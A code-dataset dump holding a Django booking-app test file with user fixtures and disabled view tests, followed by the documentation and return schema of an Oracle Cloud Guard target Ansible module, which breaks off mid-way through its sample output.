86356a16194f55ecf1ebf6d2a79d4e791ac27e68
| 2,844
|
py
|
Python
|
searchBar/booking/tests.py
|
rajvijen/Industry-Visit-Planning-and-Booking
|
fe54f9f354eb88cd78b1bc18a61908fe7de03577
|
[
"MIT"
] | null | null | null |
searchBar/booking/tests.py
|
rajvijen/Industry-Visit-Planning-and-Booking
|
fe54f9f354eb88cd78b1bc18a61908fe7de03577
|
[
"MIT"
] | 8
|
2019-09-05T04:58:20.000Z
|
2022-01-13T00:58:01.000Z
|
searchBar/booking/tests.py
|
rajvijen/ASE-101
|
fe54f9f354eb88cd78b1bc18a61908fe7de03577
|
[
"MIT"
] | 5
|
2018-11-15T19:04:29.000Z
|
2018-11-17T06:10:38.000Z
|
from django.test import TestCase ,Client
from django.http import HttpRequest
from django.urls import reverse
from basicapp.models import UserProfileInfo
from django.contrib.auth.models import User
class ListView_Testing(TestCase):
@classmethod
def setUpTestData(cls):
cls.client = Client()
cls.user = User.objects.create_user(username = "hemanth",email='hreddy281@gmail.com', password='devilmaycry4')
cls.profile = UserProfileInfo.objects.create(user = cls.user,name = "hemanth",gender = "M")
'''
def test_con_indi(self):
self.client.force_login(self.user)
response = self.client.get(reverse('booking:con_indi'))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'booking/book_indi.html')
def test_con_orga(self):
self.client.force_login(self.user)
response = self.client.get(reverse('booking:con_orga'))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'booking/book_orga.html')
def test_book_train_indi(self):
#self.client.force_login(self.user)
response = self.client.get(reverse('booking:book_train_indi'))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'booking/list_train.html')
def test_view_book_air_orga(self):
response = self.client.get(reverse('booking:book_air_indi'))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'booking/list_flight.html')
'''
class URL_Testing(TestCase):
    """URL-level tests for the booking app (currently all disabled)."""

    @classmethod
    def setUpTestData(cls):
        # One-time class fixtures: an auth user and its UserProfileInfo row.
        # NOTE(review): TestCase already provides a per-test self.client;
        # keeping cls.client preserves the existing class attribute.
        cls.client = Client()
        cls.user = User.objects.create_user(username = "hemanth",email='hreddy281@gmail.com', password='devilmaycry4')
        cls.profile = UserProfileInfo.objects.create(user = cls.user,name = "hemanth",gender = "M")

    # Disabled tests kept for reference inside a dead string, as elsewhere
    # in this file.
    '''
    def test_con_indi(self):
        response = self.client.get(reverse('booking:con_indi'))
        self.assertEqual(response.status_code, 302)
    def test_con_orga(self):
        response = self.client.get(reverse('booking:con_orga'))
        self.assertEqual(response.status_code, 302)
    def test_book_train_indi(self):
        #self.client.force_login(self.user)
        response = self.client.get(reverse('booking:book_train_indi'))
        self.assertEqual(response.status_code, 200)
        #self.assertTemplateUsed(response, 'booking/list_train.html')
    '''


class Form_Testing(TestCase):
    """Fixture scaffold for form tests.

    BUG FIX: in the original file the triple-quoted string opened before
    ``test_con_indi`` in URL_Testing did not close until after this class's
    ``setUpTestData``, so ``Form_Testing`` was never defined — its whole body
    was dead text inside that string. The string is now closed before this
    class so the class actually exists.
    """

    @classmethod
    def setUpTestData(cls):
        # Same one-time fixtures as the other test classes.
        cls.client = Client()
        cls.user = User.objects.create_user(username = "hemanth",email='hreddy281@gmail.com', password='devilmaycry4')
        cls.profile = UserProfileInfo.objects.create(user = cls.user,name = "hemanth",gender = "M")
| 41.217391
| 119
| 0.686709
| 338
| 2,844
| 5.630178
| 0.180473
| 0.057803
| 0.066211
| 0.077246
| 0.871256
| 0.862323
| 0.862323
| 0.860221
| 0.82659
| 0.82659
| 0
| 0.014348
| 0.19128
| 2,844
| 69
| 120
| 41.217391
| 0.813043
| 0
| 0
| 0.588235
| 0
| 0
| 0.107981
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0.117647
| 0.294118
| 0
| 0.529412
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 8
|
86512d418fe64d54f1cb927d25353cdfea239c81
| 102,502
|
py
|
Python
|
plugins/modules/oci_cloud_guard_target.py
|
sohwaje/oci-ansible-collection
|
9e6b8cf55e596a96560710a457a7df05886fc59c
|
[
"Apache-2.0"
] | null | null | null |
plugins/modules/oci_cloud_guard_target.py
|
sohwaje/oci-ansible-collection
|
9e6b8cf55e596a96560710a457a7df05886fc59c
|
[
"Apache-2.0"
] | null | null | null |
plugins/modules/oci_cloud_guard_target.py
|
sohwaje/oci-ansible-collection
|
9e6b8cf55e596a96560710a457a7df05886fc59c
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# Copyright (c) 2020, 2021 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_cloud_guard_target
short_description: Manage a Target resource in Oracle Cloud Infrastructure
description:
- This module allows the user to create, update and delete a Target resource in Oracle Cloud Infrastructure
- For I(state=present), creates a new Target
version_added: "2.9.0"
author: Oracle (@oracle)
options:
display_name:
description:
- DetectorTemplate Identifier
- Required for create using I(state=present).
- Required for update, delete when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is set.
- This parameter is updatable when C(OCI_USE_NAME_AS_IDENTIFIER) is not set.
type: str
aliases: ["name"]
compartment_id:
description:
- Compartment Identifier where the resource is created
- Required for create using I(state=present).
- Required for update when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is set.
- Required for delete when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is set.
type: str
description:
description:
- The target description.
type: str
target_resource_type:
description:
- possible type of targets(compartment/HCMCloud/ERPCloud)
- Required for create using I(state=present).
type: str
choices:
- "COMPARTMENT"
- "ERPCLOUD"
- "HCMCLOUD"
target_resource_id:
description:
- Resource ID which the target uses to monitor
- Required for create using I(state=present).
type: str
target_detector_recipes:
description:
- List of detector recipes to associate with target
- This parameter is updatable.
type: list
elements: dict
suboptions:
detector_recipe_id:
description:
- Identifier for DetectorRecipe.
type: str
detector_rules:
description:
- Overrides to be applied to Detector Rule associated with the target
type: list
elements: dict
suboptions:
detector_rule_id:
description:
- Identifier for DetectorRule.
type: str
required: true
details:
description:
- ""
type: dict
required: true
suboptions:
condition_groups:
description:
- Condition group corresponding to each compartment
type: list
elements: dict
suboptions:
compartment_id:
description:
- compartment associated with condition
type: str
required: true
condition:
description:
- ""
type: dict
required: true
suboptions:
kind:
description:
- Type of condition object
type: str
choices:
- "SIMPLE"
- "COMPOSITE"
required: true
parameter:
description:
- parameter Key
- Applicable when kind is 'SIMPLE'
type: str
operator:
description:
- type of operator
- Applicable when kind is 'SIMPLE'
type: str
choices:
- "IN"
- "NOT_IN"
- "EQUALS"
- "NOT_EQUALS"
value:
description:
- type of operator
- Applicable when kind is 'SIMPLE'
type: str
value_type:
description:
- type of value
- Applicable when kind is 'SIMPLE'
type: str
choices:
- "MANAGED"
- "CUSTOM"
left_operand:
description:
- ""
- Applicable when kind is 'COMPOSITE'
type: dict
suboptions:
kind:
description:
- Type of condition object
type: str
choices:
- "COMPOSITE"
- "SIMPLE"
required: true
composite_operator:
description:
- ""
- Applicable when kind is 'COMPOSITE'
type: str
choices:
- "AND"
- "OR"
right_operand:
description:
- ""
- Applicable when kind is 'COMPOSITE'
type: dict
suboptions:
kind:
description:
- Type of condition object
type: str
choices:
- "COMPOSITE"
- "SIMPLE"
required: true
target_detector_recipe_id:
description:
- Identifier for DetectorRecipe.
- This parameter is updatable.
type: str
target_responder_recipes:
description:
- List of responder recipes to associate with target
- This parameter is updatable.
type: list
elements: dict
suboptions:
responder_recipe_id:
description:
- Identifier for ResponderRecipe.
type: str
responder_rules:
description:
- Override responder rules associated with reponder recipe in a target.
type: list
elements: dict
suboptions:
responder_rule_id:
description:
- Identifier for ResponderRule.
type: str
required: true
details:
description:
- ""
type: dict
required: true
suboptions:
condition:
description:
- ""
type: dict
suboptions:
kind:
description:
- Type of condition object
type: str
choices:
- "SIMPLE"
- "COMPOSITE"
required: true
parameter:
description:
- parameter Key
- Applicable when kind is 'SIMPLE'
type: str
operator:
description:
- type of operator
- Applicable when kind is 'SIMPLE'
type: str
choices:
- "IN"
- "NOT_IN"
- "EQUALS"
- "NOT_EQUALS"
value:
description:
- type of operator
- Applicable when kind is 'SIMPLE'
type: str
value_type:
description:
- type of value
- Applicable when kind is 'SIMPLE'
type: str
choices:
- "MANAGED"
- "CUSTOM"
left_operand:
description:
- ""
- Applicable when kind is 'COMPOSITE'
type: dict
suboptions:
kind:
description:
- Type of condition object
type: str
choices:
- "COMPOSITE"
- "SIMPLE"
required: true
composite_operator:
description:
- ""
- Applicable when kind is 'COMPOSITE'
type: str
choices:
- "AND"
- "OR"
right_operand:
description:
- ""
- Applicable when kind is 'COMPOSITE'
type: dict
suboptions:
kind:
description:
- Type of condition object
type: str
choices:
- "COMPOSITE"
- "SIMPLE"
required: true
configurations:
description:
- Configurations associated with the ResponderRule
type: list
elements: dict
suboptions:
config_key:
description:
- Unique name of the configuration
type: str
required: true
name:
description:
- configuration name
type: str
required: true
value:
description:
- configuration value
type: str
required: true
mode:
description:
- Execution Mode for ResponderRule
type: str
choices:
- "AUTOACTION"
- "USERACTION"
target_responder_recipe_id:
description:
- Identifier for ResponderRecipe.
- This parameter is updatable.
type: str
lifecycle_state:
description:
- The current state of the DetectorRule.
- This parameter is updatable.
type: str
choices:
- "CREATING"
- "UPDATING"
- "ACTIVE"
- "INACTIVE"
- "DELETING"
- "DELETED"
- "FAILED"
freeform_tags:
description:
- "Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.
Example: `{\\"bar-key\\": \\"value\\"}`"
- This parameter is updatable.
type: dict
defined_tags:
description:
- "Defined tags for this resource. Each key is predefined and scoped to a namespace.
Example: `{\\"foo-namespace\\": {\\"bar-key\\": \\"value\\"}}`"
- This parameter is updatable.
type: dict
target_id:
description:
- OCID of target
- Required for update using I(state=present) when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is not set.
- Required for delete using I(state=absent) when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is not set.
type: str
aliases: ["id"]
state:
description:
- The state of the Target.
- Use I(state=present) to create or update a Target.
- Use I(state=absent) to delete a Target.
type: str
required: false
default: 'present'
choices: ["present", "absent"]
extends_documentation_fragment: [ oracle.oci.oracle, oracle.oci.oracle_creatable_resource, oracle.oci.oracle_wait_options ]
"""
EXAMPLES = """
- name: Create target
oci_cloud_guard_target:
display_name: display_name_example
compartment_id: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
target_resource_type: COMPARTMENT
target_resource_id: "ocid1.targetresource.oc1..xxxxxxEXAMPLExxxxxx"
- name: Update target using name (when environment variable OCI_USE_NAME_AS_IDENTIFIER is set)
oci_cloud_guard_target:
display_name: display_name_example
compartment_id: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
lifecycle_state: CREATING
freeform_tags: {'Department': 'Finance'}
defined_tags: {'Operations': {'CostCenter': 'US'}}
- name: Update target
oci_cloud_guard_target:
display_name: display_name_example
target_id: "ocid1.target.oc1..xxxxxxEXAMPLExxxxxx"
- name: Delete target
oci_cloud_guard_target:
target_id: "ocid1.target.oc1..xxxxxxEXAMPLExxxxxx"
state: absent
- name: Delete target using name (when environment variable OCI_USE_NAME_AS_IDENTIFIER is set)
oci_cloud_guard_target:
display_name: display_name_example
compartment_id: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
state: absent
"""
RETURN = """
target:
description:
- Details of the Target resource acted upon by the current operation
returned: on success
type: complex
contains:
id:
description:
- Unique identifier that is immutable on creation
returned: on success
type: str
sample: "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx"
display_name:
description:
- Target Identifier, can be renamed
returned: on success
type: str
sample: display_name_example
compartment_id:
description:
- Compartment Identifier where the resource is created
returned: on success
type: str
sample: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
description:
description:
- The target description.
returned: on success
type: str
sample: description_example
target_resource_type:
description:
- possible type of targets
returned: on success
type: str
sample: COMPARTMENT
target_resource_id:
description:
- Resource ID which the target uses to monitor
returned: on success
type: str
sample: "ocid1.targetresource.oc1..xxxxxxEXAMPLExxxxxx"
recipe_count:
description:
- Total number of recipes attached to target
returned: on success
type: int
sample: 56
target_detector_recipes:
description:
- List of detector recipes associated with target
returned: on success
type: complex
contains:
id:
description:
- Ocid for detector recipe
returned: on success
type: str
sample: "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx"
display_name:
description:
- DisplayName of detector recipe
returned: on success
type: str
sample: display_name_example
description:
description:
- Detector recipe description
returned: on success
type: str
sample: description_example
compartment_id:
description:
- compartmentId of detector recipe
returned: on success
type: str
sample: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
detector_recipe_id:
description:
- Unique identifier for Detector Recipe of which this is an extension
returned: on success
type: str
sample: "ocid1.detectorrecipe.oc1..xxxxxxEXAMPLExxxxxx"
owner:
description:
- Owner of detector recipe
returned: on success
type: str
sample: CUSTOMER
detector:
description:
- Type of detector
returned: on success
type: str
sample: IAAS_ACTIVITY_DETECTOR
detector_rules:
description:
- "List of detector rules for the detector type for recipe - user input"
returned: on success
type: complex
contains:
detector_rule_id:
description:
- The unique identifier of the detector rule
returned: on success
type: str
sample: "ocid1.detectorrule.oc1..xxxxxxEXAMPLExxxxxx"
display_name:
description:
- displayName
returned: on success
type: str
sample: display_name_example
description:
description:
- Description for TargetDetectorRecipeDetectorRule
returned: on success
type: str
sample: description_example
recommendation:
description:
- Recommendation for TargetDetectorRecipeDetectorRule
returned: on success
type: str
sample: recommendation_example
detector:
description:
- detector for the rule
returned: on success
type: str
sample: IAAS_ACTIVITY_DETECTOR
service_type:
description:
- service type of the configuration to which the rule is applied
returned: on success
type: str
sample: service_type_example
resource_type:
description:
- resource type of the configuration to which the rule is applied
returned: on success
type: str
sample: resource_type_example
details:
description:
- ""
returned: on success
type: complex
contains:
is_enabled:
description:
- Enables the control
returned: on success
type: bool
sample: true
risk_level:
description:
- The Risk Level
returned: on success
type: str
sample: CRITICAL
configurations:
description:
- Configuration details
returned: on success
type: complex
contains:
config_key:
description:
- Unique name of the configuration
returned: on success
type: str
sample: config_key_example
name:
description:
- configuration name
returned: on success
type: str
sample: name_example
value:
description:
- configuration value
returned: on success
type: str
sample: value_example
data_type:
description:
- configuration data type
returned: on success
type: str
sample: data_type_example
values:
description:
- List of configuration values
returned: on success
type: complex
contains:
list_type:
description:
- configuration list item type, either CUSTOM or MANAGED
returned: on success
type: str
sample: MANAGED
managed_list_type:
description:
- type of the managed list
returned: on success
type: str
sample: managed_list_type_example
value:
description:
- configuration value
returned: on success
type: str
sample: value_example
condition_groups:
description:
- Condition group corresponding to each compartment
returned: on success
type: complex
contains:
compartment_id:
description:
- compartment associated with condition
returned: on success
type: str
sample: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
condition:
description:
- ""
returned: on success
type: complex
contains:
kind:
description:
- Type of condition object
returned: on success
type: str
sample: COMPOSITE
left_operand:
description:
- ""
returned: on success
type: complex
contains:
kind:
description:
- Type of condition object
returned: on success
type: str
sample: COMPOSITE
composite_operator:
description:
- ""
returned: on success
type: str
sample: AND
right_operand:
description:
- ""
returned: on success
type: complex
contains:
kind:
description:
- Type of condition object
returned: on success
type: str
sample: COMPOSITE
parameter:
description:
- parameter Key
returned: on success
type: str
sample: parameter_example
operator:
description:
- type of operator
returned: on success
type: str
sample: IN
value:
description:
- type of operator
returned: on success
type: str
sample: value_example
value_type:
description:
- type of value
returned: on success
type: str
sample: MANAGED
labels:
description:
- user defined labels for a detector rule
returned: on success
type: list
sample: []
is_configuration_allowed:
description:
- configuration allowed or not
returned: on success
type: bool
sample: true
managed_list_types:
description:
- List of cloudguard managed list types related to this rule
returned: on success
type: list
sample: []
time_created:
description:
- The date and time the target detector recipe rule was created. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
time_updated:
description:
- The date and time the target detector recipe rule was updated. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
lifecycle_state:
description:
- The current state of the DetectorRule.
returned: on success
type: str
sample: CREATING
lifecycle_details:
description:
- A message describing the current state in more detail. For example, can be used to provide actionable information for a
resource in Failed state.
returned: on success
type: str
sample: lifecycle_details_example
effective_detector_rules:
description:
- List of effective detector rules for the detector type for recipe after applying defaults
returned: on success
type: complex
contains:
detector_rule_id:
description:
- The unique identifier of the detector rule
returned: on success
type: str
sample: "ocid1.detectorrule.oc1..xxxxxxEXAMPLExxxxxx"
display_name:
description:
- displayName
returned: on success
type: str
sample: display_name_example
description:
description:
- Description for TargetDetectorRecipeDetectorRule
returned: on success
type: str
sample: description_example
recommendation:
description:
- Recommendation for TargetDetectorRecipeDetectorRule
returned: on success
type: str
sample: recommendation_example
detector:
description:
- detector for the rule
returned: on success
type: str
sample: IAAS_ACTIVITY_DETECTOR
service_type:
description:
- service type of the configuration to which the rule is applied
returned: on success
type: str
sample: service_type_example
resource_type:
description:
- resource type of the configuration to which the rule is applied
returned: on success
type: str
sample: resource_type_example
details:
description:
- ""
returned: on success
type: complex
contains:
is_enabled:
description:
- Enables the control
returned: on success
type: bool
sample: true
risk_level:
description:
- The Risk Level
returned: on success
type: str
sample: CRITICAL
configurations:
description:
- Configuration details
returned: on success
type: complex
contains:
config_key:
description:
- Unique name of the configuration
returned: on success
type: str
sample: config_key_example
name:
description:
- configuration name
returned: on success
type: str
sample: name_example
value:
description:
- configuration value
returned: on success
type: str
sample: value_example
data_type:
description:
- configuration data type
returned: on success
type: str
sample: data_type_example
values:
description:
- List of configuration values
returned: on success
type: complex
contains:
list_type:
description:
- configuration list item type, either CUSTOM or MANAGED
returned: on success
type: str
sample: MANAGED
managed_list_type:
description:
- type of the managed list
returned: on success
type: str
sample: managed_list_type_example
value:
description:
- configuration value
returned: on success
type: str
sample: value_example
condition_groups:
description:
- Condition group corresponding to each compartment
returned: on success
type: complex
contains:
compartment_id:
description:
- compartment associated with condition
returned: on success
type: str
sample: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
condition:
description:
- ""
returned: on success
type: complex
contains:
kind:
description:
- Type of condition object
returned: on success
type: str
sample: COMPOSITE
left_operand:
description:
- ""
returned: on success
type: complex
contains:
kind:
description:
- Type of condition object
returned: on success
type: str
sample: COMPOSITE
composite_operator:
description:
- ""
returned: on success
type: str
sample: AND
right_operand:
description:
- ""
returned: on success
type: complex
contains:
kind:
description:
- Type of condition object
returned: on success
type: str
sample: COMPOSITE
parameter:
description:
- parameter Key
returned: on success
type: str
sample: parameter_example
operator:
description:
- type of operator
returned: on success
type: str
sample: IN
value:
description:
- type of operator
returned: on success
type: str
sample: value_example
value_type:
description:
- type of value
returned: on success
type: str
sample: MANAGED
labels:
description:
- user defined labels for a detector rule
returned: on success
type: list
sample: []
is_configuration_allowed:
description:
- configuration allowed or not
returned: on success
type: bool
sample: true
managed_list_types:
description:
- List of cloudguard managed list types related to this rule
returned: on success
type: list
sample: []
time_created:
description:
- The date and time the target detector recipe rule was created. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
time_updated:
description:
- The date and time the target detector recipe rule was updated. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
lifecycle_state:
description:
- The current state of the DetectorRule.
returned: on success
type: str
sample: CREATING
lifecycle_details:
description:
- A message describing the current state in more detail. For example, can be used to provide actionable information for a
resource in Failed state.
returned: on success
type: str
sample: lifecycle_details_example
time_created:
description:
- The date and time the target detector recipe was created. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
time_updated:
description:
- The date and time the target detector recipe was updated. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
lifecycle_state:
description:
- The current state of the resource.
returned: on success
type: str
sample: CREATING
target_responder_recipes:
description:
- List of responder recipes associated with target
returned: on success
type: complex
contains:
id:
description:
- Unique identifier of TargetResponderRecipe that is immutable on creation
returned: on success
type: str
sample: "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx"
responder_recipe_id:
description:
- Unique identifier for Responder Recipe of which this is an extension
returned: on success
type: str
sample: "ocid1.responderrecipe.oc1..xxxxxxEXAMPLExxxxxx"
compartment_id:
description:
- Compartment Identifier
returned: on success
type: str
sample: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
display_name:
description:
- ResponderRecipe Identifier Name
returned: on success
type: str
sample: display_name_example
description:
description:
- ResponderRecipe Description
returned: on success
type: str
sample: description_example
owner:
description:
- Owner of ResponderRecipe
returned: on success
type: str
sample: CUSTOMER
time_created:
description:
- The date and time the target responder recipe rule was created. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
time_updated:
description:
- The date and time the target responder recipe rule was updated. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
responder_rules:
description:
- "List of responder rules associated with the recipe - user input"
returned: on success
type: complex
contains:
responder_rule_id:
description:
- Identifier for ResponderRule.
returned: on success
type: str
sample: "ocid1.responderrule.oc1..xxxxxxEXAMPLExxxxxx"
display_name:
description:
- ResponderRule Display Name
returned: on success
type: str
sample: display_name_example
description:
description:
- ResponderRule Description
returned: on success
type: str
sample: description_example
type:
description:
- Type of Responder
returned: on success
type: str
sample: REMEDIATION
policies:
description:
- List of Policy
returned: on success
type: list
sample: []
supported_modes:
description:
- Supported Execution Modes
returned: on success
type: list
sample: []
details:
description:
- ""
returned: on success
type: complex
contains:
condition:
description:
- ""
returned: on success
type: complex
contains:
kind:
description:
- Type of condition object
returned: on success
type: str
sample: COMPOSITE
left_operand:
description:
- ""
returned: on success
type: complex
contains:
kind:
description:
- Type of condition object
returned: on success
type: str
sample: COMPOSITE
composite_operator:
description:
- ""
returned: on success
type: str
sample: AND
right_operand:
description:
- ""
returned: on success
type: complex
contains:
kind:
description:
- Type of condition object
returned: on success
type: str
sample: COMPOSITE
parameter:
description:
- parameter Key
returned: on success
type: str
sample: parameter_example
operator:
description:
- type of operator
returned: on success
type: str
sample: IN
value:
description:
- type of operator
returned: on success
type: str
sample: value_example
value_type:
description:
- type of value
returned: on success
type: str
sample: MANAGED
configurations:
description:
- ResponderRule configurations
returned: on success
type: complex
contains:
config_key:
description:
- Unique name of the configuration
returned: on success
type: str
sample: config_key_example
name:
description:
- configuration name
returned: on success
type: str
sample: name_example
value:
description:
- configuration value
returned: on success
type: str
sample: value_example
is_enabled:
description:
- Identifies state for ResponderRule
returned: on success
type: bool
sample: true
mode:
description:
- Execution Mode for ResponderRule
returned: on success
type: str
sample: AUTOACTION
compartment_id:
description:
- Compartment Identifier
returned: on success
type: str
sample: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
time_created:
description:
- The date and time the target responder recipe rule was created. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
time_updated:
description:
- The date and time the target responder recipe rule was updated. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
lifecycle_state:
description:
- The current state of the ResponderRule.
returned: on success
type: str
sample: CREATING
lifecycle_details:
description:
- A message describing the current state in more detail. For example, can be used to provide actionable information for a
resource in Failed state.
returned: on success
type: str
sample: lifecycle_details_example
effective_responder_rules:
description:
- List of responder rules associated with the recipe after applying all defaults
returned: on success
type: complex
contains:
responder_rule_id:
description:
- Identifier for ResponderRule.
returned: on success
type: str
sample: "ocid1.responderrule.oc1..xxxxxxEXAMPLExxxxxx"
display_name:
description:
- ResponderRule Display Name
returned: on success
type: str
sample: display_name_example
description:
description:
- ResponderRule Description
returned: on success
type: str
sample: description_example
type:
description:
- Type of Responder
returned: on success
type: str
sample: REMEDIATION
policies:
description:
- List of Policy
returned: on success
type: list
sample: []
supported_modes:
description:
- Supported Execution Modes
returned: on success
type: list
sample: []
details:
description:
- ""
returned: on success
type: complex
contains:
condition:
description:
- ""
returned: on success
type: complex
contains:
kind:
description:
- Type of condition object
returned: on success
type: str
sample: COMPOSITE
left_operand:
description:
- ""
returned: on success
type: complex
contains:
kind:
description:
- Type of condition object
returned: on success
type: str
sample: COMPOSITE
composite_operator:
description:
- ""
returned: on success
type: str
sample: AND
right_operand:
description:
- ""
returned: on success
type: complex
contains:
kind:
description:
- Type of condition object
returned: on success
type: str
sample: COMPOSITE
parameter:
description:
- parameter Key
returned: on success
type: str
sample: parameter_example
operator:
description:
- type of operator
returned: on success
type: str
sample: IN
value:
description:
- type of operator
returned: on success
type: str
sample: value_example
value_type:
description:
- type of value
returned: on success
type: str
sample: MANAGED
configurations:
description:
- ResponderRule configurations
returned: on success
type: complex
contains:
config_key:
description:
- Unique name of the configuration
returned: on success
type: str
sample: config_key_example
name:
description:
- configuration name
returned: on success
type: str
sample: name_example
value:
description:
- configuration value
returned: on success
type: str
sample: value_example
is_enabled:
description:
- Identifies state for ResponderRule
returned: on success
type: bool
sample: true
mode:
description:
- Execution Mode for ResponderRule
returned: on success
type: str
sample: AUTOACTION
compartment_id:
description:
- Compartment Identifier
returned: on success
type: str
sample: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
time_created:
description:
- The date and time the target responder recipe rule was created. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
time_updated:
description:
- The date and time the target responder recipe rule was updated. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
lifecycle_state:
description:
- The current state of the ResponderRule.
returned: on success
type: str
sample: CREATING
lifecycle_details:
description:
- A message describing the current state in more detail. For example, can be used to provide actionable information for a
resource in Failed state.
returned: on success
type: str
sample: lifecycle_details_example
inherited_by_compartments:
description:
- List of inherited compartments
returned: on success
type: list
sample: []
time_created:
description:
- The date and time the target was created. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
time_updated:
description:
- The date and time the target was updated. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
lifecycle_state:
description:
- The current state of the Target.
returned: on success
type: str
sample: CREATING
lifecyle_details:
description:
- A message describing the current state in more detail. For example, can be used to provide actionable information for a resource in Failed
state.
returned: on success
type: str
sample: lifecyle_details_example
freeform_tags:
description:
- "Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.
Example: `{\\"bar-key\\": \\"value\\"}`"
returned: on success
type: dict
sample: {'Department': 'Finance'}
defined_tags:
description:
- "Defined tags for this resource. Each key is predefined and scoped to a namespace.
Example: `{\\"foo-namespace\\": {\\"bar-key\\": \\"value\\"}}`"
returned: on success
type: dict
sample: {'Operations': {'CostCenter': 'US'}}
system_tags:
description:
- System tags for this resource. Each key is predefined and scoped to a namespace.
For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
System tags can be viewed by users, but can only be created by the system.
- "Example: `{\\"orcl-cloud\\": {\\"free-tier-retained\\": \\"true\\"}}`"
returned: on success
type: dict
sample: {}
sample: {
"id": "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx",
"display_name": "display_name_example",
"compartment_id": "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx",
"description": "description_example",
"target_resource_type": "COMPARTMENT",
"target_resource_id": "ocid1.targetresource.oc1..xxxxxxEXAMPLExxxxxx",
"recipe_count": 56,
"target_detector_recipes": [{
"id": "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx",
"display_name": "display_name_example",
"description": "description_example",
"compartment_id": "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx",
"detector_recipe_id": "ocid1.detectorrecipe.oc1..xxxxxxEXAMPLExxxxxx",
"owner": "CUSTOMER",
"detector": "IAAS_ACTIVITY_DETECTOR",
"detector_rules": [{
"detector_rule_id": "ocid1.detectorrule.oc1..xxxxxxEXAMPLExxxxxx",
"display_name": "display_name_example",
"description": "description_example",
"recommendation": "recommendation_example",
"detector": "IAAS_ACTIVITY_DETECTOR",
"service_type": "service_type_example",
"resource_type": "resource_type_example",
"details": {
"is_enabled": true,
"risk_level": "CRITICAL",
"configurations": [{
"config_key": "config_key_example",
"name": "name_example",
"value": "value_example",
"data_type": "data_type_example",
"values": [{
"list_type": "MANAGED",
"managed_list_type": "managed_list_type_example",
"value": "value_example"
}]
}],
"condition_groups": [{
"compartment_id": "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx",
"condition": {
"kind": "COMPOSITE",
"left_operand": {
"kind": "COMPOSITE"
},
"composite_operator": "AND",
"right_operand": {
"kind": "COMPOSITE"
},
"parameter": "parameter_example",
"operator": "IN",
"value": "value_example",
"value_type": "MANAGED"
}
}],
"labels": [],
"is_configuration_allowed": true
},
"managed_list_types": [],
"time_created": "2013-10-20T19:20:30+01:00",
"time_updated": "2013-10-20T19:20:30+01:00",
"lifecycle_state": "CREATING",
"lifecycle_details": "lifecycle_details_example"
}],
"effective_detector_rules": [{
"detector_rule_id": "ocid1.detectorrule.oc1..xxxxxxEXAMPLExxxxxx",
"display_name": "display_name_example",
"description": "description_example",
